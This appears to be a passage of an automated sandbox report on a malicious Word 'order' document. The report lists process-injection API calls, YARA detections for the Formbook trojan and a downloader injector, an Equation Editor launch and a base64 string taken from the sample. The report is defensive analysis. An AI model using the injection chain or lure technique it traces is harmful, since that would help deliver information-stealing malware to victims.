      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC90 NtUnmapViewOfSection,14_2_0203FC90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FD5C NtEnumerateKey,14_2_0203FD5C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02041D80 NtSuspendThread,14_2_02041D80
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A340 NtCreateFile,14_2_0009A340
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A3F0 NtReadFile,14_2_0009A3F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A470 NtClose,14_2_0009A470
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A520 NtAllocateVirtualMemory,14_2_0009A520
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A392 NtCreateFile,NtReadFile,14_2_0009A392
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A3EA NtReadFile,14_2_0009A3EA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A43A NtReadFile,14_2_0009A43A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,14_2_00A4A036
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A49BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,14_2_00A49BAF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4A042 NtQueryInformationProcess,14_2_00A4A042
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A49BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_00A49BB2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10096: CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,14_2_00C10096
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 10_2_002442DA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0092E0C6
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0092E2E9
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009D63BF
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009563DB
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00932305
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0097A37B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009B443E
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0094C5F0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009B05E3
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00976540
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00934680
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0093E6C1
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0097A634
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009D2622
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0093C7BC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0093C85C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0095286D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009D098E
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009329B2
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009C49F5
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009469FE
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0097C920
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009DCBA4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009B6BCB
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009D2C9C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009BAC5E
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00960D3B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0093CD5B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00962E2F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0094EE4C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009CCFB1
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009A2FDC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00940F3F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0095D005
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0094905A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00933040
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009AD06D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009BD13F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009D1238
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0092F3CF
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00937353
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00965485
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00941489
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0096D47D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009D35DA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0093351F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009B579A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009657C3
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009C771D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009AF8C4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009CF8EE
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009B5955
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009B394B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009E3A83
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009BDBDA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0092FBD7
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00957B00
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009CFDDD
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_009BBF14
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0095DF7C
      Source: C:\Windows\explorer.exe | Code function: 13_2_081ED036
      Source: C:\Windows\explorer.exe | Code function: 13_2_081E4082
      Source: C:\Windows\explorer.exe | Code function: 13_2_081EB912
      Source: C:\Windows\explorer.exe | Code function: 13_2_081E5D02
      Source: C:\Windows\explorer.exe | Code function: 13_2_081F15CD
      Source: C:\Windows\explorer.exe | Code function: 13_2_081EE232
      Source: C:\Windows\explorer.exe | Code function: 13_2_081E8B32
      Source: C:\Windows\explorer.exe | Code function: 13_2_081E8B30
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D62232
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D58082
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D61036
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D655CD
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D5F912
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D59D02
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D5CB30
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D5CB32
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020F1238
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0204E2E9
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02052305
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02057353
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0209A37B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020F63BF
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0204F3CF
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020763DB
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0207D005
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02053040
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0206905A
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0204E0C6
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020F2622
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0209A634
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02054680
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0205E6C1
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020D579A
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0205C7BC
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020857C3
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020D443E
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0208D47D
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02085485
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02061489
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0205351F
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02096540
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0206C5F0
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02103A83
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02077B00
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020FCBA4
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0204FBD7
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020DDBDA
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0205C85C
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0207286D
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020EF8EE
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020D394B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020D5955
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020F098E
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020529B2
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020669FE
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02082E2F
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0206EE4C
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02060F3F
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0207DF7C
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020ECFB1
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020C2FDC
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_02080D3B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0205CD5B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_020EFDDD
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009D583
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00082D90
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009EDA5
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009E5D6
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00089E5B
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00089E60
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00082FB0
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A4A036
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A41082
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A4E5CD
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A42D02
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A48912
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A4B232
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A45B30
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A45B32
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0204DF5C appears 119 times
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 02093F92 appears 132 times
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0209373B appears 244 times
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 020BF970 appears 84 times
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 00C05EBD appears 114 times
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0204E2A8 appears 38 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: String function: 0099F970 appears 84 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: String function: 00973F92 appears 132 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: String function: 0097373B appears 253 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: String function: 0092E2A8 appears 60 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: String function: 0092DF5C appears 137 times
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.32a5770.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.2296f6c.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.860000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.402124623.0000000000860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: nelb82019.scr PID: 3216, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: nelb82019.scr PID: 3248, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: wlanext.exe PID: 3372, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, DarkListView.cs | Cryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, DarkListView.cs | Cryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, DarkComboBox.cs | Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, DarkComboBox.cs | Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
      Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@10/19@27/10
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00C0359A memset,LookupPrivilegeValueW,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$der-1351125X.docx.doc
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Mutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR8D41.tmp
      Source: Order-1351125X.docx.doc | OLE indicator, Word Document stream: true
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.dr | OLE document summary: title field not present or empty
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.dr | OLE document summary: author field not present or empty
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.dr | OLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: Order-1351125X.docx.doc | ReversingLabs: Detection: 31%
      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
